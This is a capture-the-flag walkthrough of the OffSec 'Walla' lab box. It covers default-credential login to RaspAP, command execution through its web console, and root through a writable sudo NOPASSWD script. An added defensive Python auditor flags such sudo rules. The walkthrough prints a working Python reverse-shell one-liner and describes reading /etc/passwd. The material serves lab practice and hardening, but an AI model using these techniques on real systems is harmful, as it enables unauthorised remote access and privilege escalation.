Walla — An OffSec PG-Practice Box Walkthrough (CTF)

z4c777
5 min readJul 13, 2021


This box is rated as intermediate difficulty by OffSec and the community.

First I start with an nmap scan: nmap -T4 -A -v -p- 192.168.X.X --open -oN walla_scan. Lots of open ports, so I decide to check out port 8091 first since our scan shows it as an http service.

Once I visit port 8091 in my web browser I’m prompted to login.

I don’t know the password for this so I try admin/admin just to see if I can guess the user/pass. It doesn’t work so I look at the message the pop-up gives us, which is “RaspAP”. Instantly my mind starts to think about what this could be, so I google it and find out it’s an access point. Here’s their website if you want to know more about it: https://raspap.com/. As you can see below it’s advertised as a “full-featured wireless router” for Debian devices.

The next thing I do is check the documentation for RaspAP in order to find out the default username and password that is used during setup. On their website https://raspap.com/, after clicking on the “docs” link I see a screenshot of what I’m looking for.

Now we know the username and password are admin/secret. Trying this combination I log in successfully.

Whenever I’m greeted with an application, the first thing I do is find out the version so I can see if there are any exploits that match it. In this case RaspAP version 2.5 is running and there is an exploit for it. I quickly find one on github. POC: https://github.com/lb0x/cve-2020-24572. Initially the exploit won’t work, but after changing the “%d” to “%s” it would run; however, I don’t get a shell back. Looks like this is a rabbit hole. These are common in PG-Practice and on the OSCP labs/exam. It’s great practice to come across them, and come to the realization that you’re in one, so you can focus your attention elsewhere.

Next I enumerate the dashboard, and after visiting the “System” tab I see a console that allows us to run commands directly on the underlying OS the webapp is running on. Using this web console I check /etc/passwd to see which users are on the system.

After checking each user’s /home/ directory, only Walter’s has anything of interest. Here we can get local.txt just from using the web console. But what we really need is a reverse shell from the target back to our kali machine.

I check if the RaspAP box has python installed by running “which python” and sure enough python is installed. Combining this with our web console access, a reverse shell is trivial.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.X.X",8091));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

On our nc listener running on port 8091, we catch the reverse shell and we are running as www-data. I go to /home/walter/ and see local.txt and another file called “wifi_reset.py”.

This “wifi_reset.py” file is interesting because if we run “sudo -l”, which is a common command to run when trying to privesc on a Linux box, we can see which commands we can run with root privs. In this case, we can run *a lot* of commands as sudo. The only one that matters though is “(ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py”; this means that “wifi_reset.py” can be run with sudo privileges. With my current shell I don’t have write access to it, but we can upload files to the box using wget. So I create my own malicious “wifi_reset.py” file and upload it to the box in the /home/walter/ directory.

A note on sudo. The “sudo” command lets you execute commands with superuser privileges as long as your user id is in the sudoers file, giving you the necessary authorization.

Originally I had tried uploading the malicious wifi_reset.py file with a python reverse shell payload, but for some reason the box does not like any python reverse shells I tried, and believe me I spent a good 20 minutes troubleshooting this part. But if we can’t get a shell, what else can we do? Python has a module called “os” that lets us run system commands. Now you can see where this is heading. Here’s our ‘evil’ wifi_reset.py file contents. It’s pretty simple, but effective.

See? All it does is spawn a bash shell. Now let’s run our sudo command “sudo /usr/bin/python /home/walter/wifi_reset.py”.
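The root cause of this privesc is not sudo itself but a NOPASSWD rule that hands root to an interpreter plus a script path that a non-root user can replace. The following audit script is an added example (it is not from the original post and is not part of RaspAP): it parses rule lines in the shape that “sudo -l” prints, such as “(ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py”, and flags the script when the file, or the directory containing it, is owned by someone other than the trusted uid or is group/world-writable. The interpreter list, the rule regex and the sample rules are assumptions constructed for the demo; a real audit would feed it the real output of “sudo -l” on each host.

```python
"""Audit NOPASSWD sudo rules that run an interpreter on a script.

Added example, not code from the original post. It flags rules like
    (ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py
when the script, or the directory that holds it, can be modified by a
user other than the trusted owner (normally root). A writable parent
directory is enough: the file can be renamed away and replaced even
when the file itself is read-only.
"""
import os
import re
import stat
import tempfile
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Interpreters that execute whatever file path follows them (assumed list).
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "bash", "sh"}

# (runas) [TAG: TAG: ...] command args...   (simplified sudo -l line shape)
RULE_RE = re.compile(r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)")


@dataclass
class Finding:
    script: str
    reason: str


def parse_rule(line: str) -> Optional[Tuple[Set[str], List[str]]]:
    """Return (tags, argv) for one rule line, or None if it does not parse."""
    m = RULE_RE.search(line.strip())
    if not m:
        return None
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    return tags, m.group("cmd").split()


def script_from_argv(argv: List[str]) -> Optional[str]:
    """If argv is '<interpreter> <script> ...', return the script path."""
    if len(argv) >= 2 and os.path.basename(argv[0]) in INTERPRETERS:
        return argv[1]
    return None


def writable_by_untrusted(path: str, trusted_uid: int = 0) -> Optional[str]:
    """Explain why path can be modified by an untrusted user, or None if it cannot."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "does not exist (a user could create it)"
    if st.st_uid != trusted_uid:
        return f"owned by uid {st.st_uid}, not the trusted uid {trusted_uid}"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group- or world-writable"
    return None


def audit(rules: List[str], trusted_uid: int = 0) -> List[Finding]:
    """Flag NOPASSWD interpreter+script rules whose script can be swapped out."""
    findings: List[Finding] = []
    for line in rules:
        parsed = parse_rule(line)
        if parsed is None:
            continue
        tags, argv = parsed
        if "NOPASSWD" not in tags:
            continue  # a password prompt still stands between the user and root
        script = script_from_argv(argv)
        if script is None:
            continue  # not an interpreter-runs-script rule
        for target in (script, os.path.dirname(script)):
            why = writable_by_untrusted(target, trusted_uid)
            if why:
                findings.append(Finding(script, f"{target}: {why}"))
                break
    return findings


def demo() -> List[Finding]:
    """Run the audit over constructed sample rules against files in a temp dir."""
    base = tempfile.mkdtemp()  # created 0700, owned by the current user
    weak = os.path.join(base, "wifi_reset.py")
    safe = os.path.join(base, "safe_task.py")
    for p in (weak, safe):
        with open(p, "w") as f:
            f.write("print('hello')\n")
    os.chmod(weak, 0o666)  # world-writable: anyone can replace its contents
    os.chmod(safe, 0o644)
    rules = [  # constructed sample rules, not real sudoers content
        f"(ALL) NOPASSWD: /usr/bin/python {weak}",
        f"(ALL) NOPASSWD: /usr/bin/python {safe}",
        "(ALL) NOPASSWD: /usr/bin/systemctl restart hostapd",  # no script argument
        f"(ALL) /usr/bin/python {weak}",  # password still required: not flagged
    ]
    # The demo runs unprivileged, so the current uid stands in for root;
    # on a real audit keep the default trusted_uid=0.
    return audit(rules, trusted_uid=os.getuid())


if __name__ == "__main__":
    for f in demo():
        print(f"{f.script}: {f.reason}")
```

Of the four sample rules only the world-writable wifi_reset.py is reported: the read-only script passes, the systemctl rule has no script argument, and the rule without NOPASSWD still requires the user’s password. The fix on the box side is the mirror image of the finding: make the script and its directory root-owned and non-writable, or drop the NOPASSWD rule entirely.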

We get root, proof.txt and this box is done.
